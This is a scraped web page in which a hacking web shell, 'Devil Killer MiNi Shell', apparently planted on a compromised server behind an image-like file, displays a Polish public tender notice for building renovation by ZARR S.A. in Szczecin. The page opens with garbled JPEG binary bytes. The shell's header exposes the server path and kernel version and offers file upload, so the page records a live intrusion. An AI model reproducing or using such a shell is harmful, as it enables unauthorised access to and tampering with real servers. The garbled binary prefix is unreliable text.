JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230817/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230817/0035592101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Roboty budowlane na terenie obiektów należących do ZARR S.A. przy ul. Husarów 1– Budynek 4/4a </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZACHODNIOPOMORSKA AGENCJA ROZWOJU REGIONALNEGO SPÓŁKA AKCYJNA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 810603415</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Świętego Ducha 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczecin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">70-205</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL424 - Miasto Szczecin</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">91 48 82 488</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">91 48 82 626</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zarzad@zarr.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.zarr.com.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Sprawy gospodarcze i finansowe </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Roboty budowlane na terenie obiektów należących do ZARR S.A. przy ul. Husarów 1– Budynek 4/4a </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9d8af08d-3ccb-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00355921</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/zarr <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się wyłącznie elektronicznie za pośrednictwem platformy przetargowej: https://portal.smartpzp.pl/zarr. <br/>Rejestracja i korzystanie z Platformy jest bezpłatne. Dokonując rejestracji Wykonawca akceptuje regulamin korzystania z Platformy, dostępny na Platformie w zakładce „e-learning”, znajdującej się na pionowym pasku Menu po lewej stronie ekranu. Osobą uprawnioną do kontaktu z Wykonawcami jest Justyna Kotowicz – tel. 506 938 838.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z rozporządzeniem w sprawie<br/>środków komunikacji elektronicznej, Zamawiający podaje wymagania techniczne związane z korzystaniem z Platformy:<br/>1) stały dostęp do sieci Internet i minimalna prędkość połączenia internetowego nie mniejsza niż 512kb/s;<br/>2) zaktualizowana przeglądarka internetowa (zalecane przeglądarki: Google Chrome, Mozilla Firefox, Opera);<br/>3) oprogramowanie Java ver. 1.8 (w przypadku systemu operacyjnego MacOs, także oprogramowanie Java JDK Oracle);<br/>4) aplikacja Szafir;<br/>5) rozszerzenie Szafir WebModule dla danej przeglądarki internetowej;<br/>6) kwalifikowany podpis elektroniczny lub podpis (profil) zaufany lub podpis osobisty (e-dowód) (dopuszczalne formaty podpisów:<br/>PAdES lub XAdES);<br/>7) dopuszczalne formaty danych: .pdf, .doc, .docx, .rtf, .xps, .odt, .xls, .xlsx, .zip, .zipx, .rar, 7z (zalecany .pdf);8) maksymalna<br/>wielkość pojedynczego pliku: 100MB;<br/>9) w zakresie dotyczącym szyfrowania oraz czasu przekazania i odbioru danych Zamawiający informuje, że złożona przez<br/>Wykonawcę za pomocą Platformy oferta jest widoczna w systemie jako zaszyfrowana, a możliwość jej odszyfrowania i otworzenia<br/>przez Zamawiającego możliwa jest po upływie terminu składania ofert; oznaczenie czasu odbioru danych przez Platformę stanowi<br/>przypięta do dokumentu elektronicznego data oraz dokładny czas.<br/>Szczegółowe informacje oraz instrukcja pokazująca niezbędne czynności konfiguracyjne do poprawnego działania Platformy, w<br/>szczególności w odniesieniu do pkt 3-5, zostały zamieszczone w instrukcji obsługi Platformy, o której mowa w ust. 2.<br/>Dokumenty elektroniczne, oświadczenia lub cyfrowe odwzorowania dokumentów lub oświadczeń składane są przez Wykonawcę za<br/>pośrednictwem Platformy jako załączniki. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub cyfrowych<br/>odwzorowań dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów<br/>dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz<br/>rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz<br/>innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy. Za datę wpływu wszelkiej korespondencji do<br/>Zamawiającego, w tym złożenia oferty oraz dokumentów lub oświadczeń składanych razem z ofertą, uważa się datę wczytania<br/>korespondencji na Platformie. Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz<br/>informacje przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą<br/>elektroniczną, każda ze stron na żądanie drugiej strony niezwłocznie potwierdza fakt ich otrzymania.Wszelka korespondencja<br/>kierowana do Zamawiającego powinna być opatrzona numerem postępowania i nazwą nadaną zamówieniu. Ofertę należy pod<br/>rygorem nieważności złożyć w języku polskim, z zachowaniem postaci<br/>elektronicznej i podpisana kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym. Sposób złożenia oferty, opisany został w Instrukcji dostępnej na Platformie. Dokumenty lub oświadczenia, o<br/>których mowa w SWZ, są to oryginalne dokumenty lub oświadczenia<br/>w postaci elektronicznej, tj. w postaci dokumentu elektronicznego. Opatrzone kwalifikowanym podpisem elektronicznym, podpisem<br/>zaufanym lub podpisem osobistym.<br/>9. Cyfrowe odwzorowania dokumentu lub oświadczenia, o których mowa w SWZ, są to cyfrowe odwzorowania dokumentów lub<br/>oświadczeń sporządzonych w postaci papierowej poświadczone za zgodność z oryginałem.<br/>10. Poświadczenia za zgodność z oryginałem cyfrowego odwzorowania dokumentu lub oświadczenia dokonuje się w postaci<br/>elektronicznej, tj. kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) dalej „RODO”, informuję, że:<br/>Administratorem Pani/Pana danych osobowych jest Zachodniopomorska Agencja Rozwoju Regionalnego S.A., ul. św. Ducha 2, 70-540 Szczecin (dalej: ZARR S.A.),<br/>Administrator przetwarza Państwa dane osobowe w ściśle określonym, minimalnym zakresie niezbędnym do zawarcia, należytego wykonania, rozwiązania lub podjęcia innych czynności niezbędnych do realizacji zawartych umów, bądź wypełnienia obowiązków wynikających z przepisów prawa,<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b-c RODO w celu związanym niniejszym postępowaniem prowadzonym na podstawie przepisów ustawy Pzp,<br/>Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 ust. 1 i ust. 6 oraz art. 74 PZP,<br/>Dane osobowe przetwarzane przez ZARR S.A. przechowywane będą przez okres niezbędny do realizacji celu dla jakiego zostały zebrane oraz zgodnie z terminami archiwizacji określonymi przez przepisy aktualnie obowiązującego prawa, tj. przez czas trwania postępowania o udzielenie zamówieni oraz na podstawie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. W szczególności dane osobowe:<br/>a)pozyskane w związku z zawartą umową będą̨ przetwarzane przez ZARR przez okres przedawnienia roszczeń podatkowych lub roszczeń cywilnoprawnych ZARR lub osoby, której dane są przetwarzane, w zależności które z tych zdarzeń nastąpi później,<br/>b)pozyskane w związku z realizacją prawnie uzasadnionego interesu przez ZARR - są przetwarzane przez okres wymagany przepisami prawa,<br/>c)pozyskane w związku z realizacją innych celów - są przetwarzane w czasie niezbędnym do zrealizowania celu.<br/>Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z PZP,<br/>Każda osoba, której dane są przetwarzane przez ZARR S.A. - z wyjątkami zastrzeżonymi przepisami prawa - ma możliwość dostępu do swoich danych osobowych w bazie ZARR i ich sprostowania, usunięcia, ograniczenia ich przetwarzania, a także prawo do zgłoszenia sprzeciwu co do ich przetwarzania. Dostęp do danych możliwy jest w siedzibie ZARR. ZARR udostępnia adres e-mail iodo@zarr.com.pl, za pomocą którego można kontaktować się̨ w sprawie danych osobowych,<br/>Nie przysługuje Pani/Panu: prawo do usunięcia danych osobowych w związku z art. 17 ust. 3 lit. b, d lub e RODO, prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO oraz prawo sprzeciwu wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Każda osoba, której dane są przetwarzane przez ZARR S.A. ma prawo wniesienia skargi do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa,<br/>Podanie przez Państwa danych osobowych jest dobrowolne, aczkolwiek odmowa ich podania jest równoznaczna z brakiem możliwości wzięcia udziału w postępowaniu o udzielenie zamówienia.<br/>ZARR nie podejmuje zautomatyzowanych decyzji na podstawie danych osobowych, w tym nie dokonuje profilowania.<br/>Dane osobowe nie będą przekazywane do państwa trzeciego i organizacji międzynarodowych w rozumieniu ogólnego rozporządzenia o ochronie danych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">5/WZM/272/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest realizacja robót budowlanych w budynku 4/4a zlokalizowanego przy ul. Husarów 1 w Szczecinie w formule ,,zaprojektuj i wybuduj”. <br/>W ramach zamówienia Wykonawca opracuje dokumentację projektową, uzyska ostateczne pozwolenie na budowę oraz zrealizuje roboty budowlane w następującym zakresie:<br/>1)	wymiana pokrycia dachowego w budynkach 4 i 4a;<br/>2)	wymiana odwodnienia dachu oraz obróbek blacharskich w budynkach 4 i 4a;<br/>3)	przemurowanie kominów w budynkach 4 i 4a;<br/>4)	wykonanie nowej instalacji odgromowej w budynkach 4 i 4a;<br/>5)	zabezpieczenie konstrukcji stalowej w poziomie piwnicy budynku 4a;<br/>6)	odtworzenie żelbetowej rampy i schodów przed wejściem do budynku 4A;<br/>7)	odtworzenie murowanego wejścia do piwnicy w budynku 4A.<br/>2.	Szczegółowy zakres prac i robót budowlanych oraz stawiane wymagania techniczne, ekonomiczne, architektoniczne, materiałowe i funkcjonalne określa Program Funkcjonalno-Użytkowy wraz z załącznikami do niego (dalej PFU) stanowiący Załącznik nr 6 do SWZ.<br/>3.	Wytyczne do zamówienia:<br/>1)	Po przygotowaniu dokumentacji projektowej, Wykonawca zobowiązany będzie uzyskać akceptację Miejskiego Konserwatora Zabytków i tym samym zgodę na realizację robót.<br/>2)	W przypadku braku zgody lub zgłoszeniem uwag, Wykonawca zmodyfikuje przygotowany projekt w celu uzyskania ostatecznej zgody Konserwatora.<br/>3)	W przypadku wyznaczenia przez Miejskiego Konserwatora Zabytków obowiązku przygotowania programu konserwatorskiego, Wykonawca przygotuje taki dokument.<br/>4)	Po uzyskaniu zgody Miejskiego Konserwatora Zabytków, Wykonawca złoży wniosek <br/>o pozwolenie na realizację robót budowlanych do Wydziału Architektury i Budownictwa w Urzędzie Miejskim w Szczecinie.<br/>5)	Po rozpoczęciu prac budowlanych, Wykonawca poinformuje Miejskiego Konserwatora Zabytków oraz Powiatowy Inspektorat Nadzoru Budowlanego o rozpoczęciu prac.<br/>6)	Wykonawca zgłosi zamiar demontażu płyt azbestowych w terminie co najmniej 7 dni przed rozpoczęciem prac organowi nadzoru budowlanego, właściwemu okręgowemu inspektoratowi pracy oraz właściwego państwowego inspektoratu sanitarnego.<br/>7)	Po zakończeniu prac budowlanych, Wykonawca poinformuje Miejskiego Konserwatora Zabytków oraz Powiatowy Inspektorat Nadzoru Budowlanego o zakończeniu prac.<br/>8)	Po zakończeniu prac Wykonawca przygotuje kompletną dokumentacją powykonawczą, w tym opracuje program odśnieżania dachu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">45261900-3 - Naprawa i konserwacja dachów</p> <p class="mb-0">45312311-0 - Montaż instalacji piorunochronnej</p> <p class="mb-0">45261320-3 - Kładzenie rynien</p> <p class="mb-0">45343100-4 - Roboty w zakresie umocnień przeciwogniowych</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45262660-5 - Usuwanie azbestu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 11.	Zamawiający przewiduje skorzystanie z prawa opcji, o którym mowa w art. 441 ustawy PZP:<br/>1)	Realizacja prawa opcji polegać będzie na pełnieniu nadzoru autorskiego nad robotami objętymi Przedmiotem Zamówienia.<br/>2)	Wykonawca wskaże w Formularzu Oferty maksymalną wartość netto i brutto za wykonanie opcjonalnego przedmiotu zamówienia, z zastrzeżeniem Rozdziału XV pkt 1 ppkt 3 SWZ.<br/>3)	Skorzystanie z opcjonalnego przedmiotu zamówienia jest jednostronnym uprawnieniem Zamawiającego, a Wykonawcy nie przysługują wobec Zamawiającego żadne roszczenia z tytułu braku wykorzystania z opcjonalnego przedmiotu Zamówienia.<br/>4)	Zamawiający może skorzystać z opcji na następujących warunkach (łącznie):<br/>a)	Złożenie Wykonawcy oświadczenia o skorzystaniu z prawa opcji nastąpi w terminie przewidzianym na końcowy odbiór dokumentacji projektowej, o którym mowa w §1a ust.4 projektu umowy, nastąpi w terminie przewidzianym na końcowy odbiór dokumentacji projektowej, zgodnie z §13 ust.6 wzoru umowy;<br/>b)	Oświadczenie, o którym mowa w ppk 11 ppkt 1 powyżej, będzie zawierało żądanie wykonania przez Wykonawcę opcjonalnego przedmiotu zamówienia polegającego na sprawowaniu nadzoru autorskiego nad zaprojektowanymi robotami budowalnymi, o wartości o której mowa w § 8 ust. 2 lit. c Wzoru Umowy; <br/>c)	Złożenie Wykonawcy oświadczenia o skorzystaniu z prawa opcji nastąpi w formie pisemnej. Oddanie pisma zawierającego oświadczenie w polskiej placówce pocztowej operatora wyznaczonego w rozumieniu ustawy z dnia 23 listopada 2012 r. - Prawo pocztowe lub w placówce pocztowej operatora świadczącego pocztowe usługi powszechne w innym państwie członkowskim Unii Europejskiej jest równoznaczne z zachowaniem terminu określonego w pkt 11 ppkt 4 lit. a) powyżej (§ 1a ust. 4 lit. b Wzoru Umowy).<br/>5)	Złożenie Wykonawcy oświadczenia o skorzystaniu z prawa opcji jest równoznaczne z poinformowaniem Wykonawcy o uruchomieniu prawa opcji. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">160 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przy wyborze najkorzystniejszej oferty będzie się kierował następującymi kryteriami wg wzorów w SWZ Rozdział<br/>1) Cena (C) – waga kryterium 60%; <br/>a) Podstawą przyznania punktów w kryterium „cena” będzie cena całkowita ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym. <br/>b) Cena całkowita ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/><br/>2) Termin wykonania zamówienia (T) – waga kryterium 40%. <br/>a)	Wykonawca jest zobowiązany zadeklarować termin w przedziale, od 120 dni do 160 dni od daty podpisania umowy.<br/>b)	W przypadku zadeklarowania terminu innego niż określony w przedziale z lit. a) powyżej, Zamawiający odrzuci ofertę.<br/>c)	W przypadku braku wskazania terminu w formularzu ofertowym, Zamawiający przypisze ofercie Wykonawcy termin maksymalny określony w przedziale z lit. a) powyżej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale VI SWZ oraz spełniają warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej:<br/>Celem spełnienia warunku udziału Wykonawca musi wykazać, że nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie co najmniej 2 (dwie) roboty budowlane polegające na remoncie lub wykonaniu pokrycia dachowego o wartości łącznej nie mniejszej niż 500.000,00 zł brutto, w tym jedna z nich zrealizowana w formule „zaprojektuj i wybuduj”.<br/>2. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawca może polegać na zdolnościach podmiotów udostępniających zasoby, 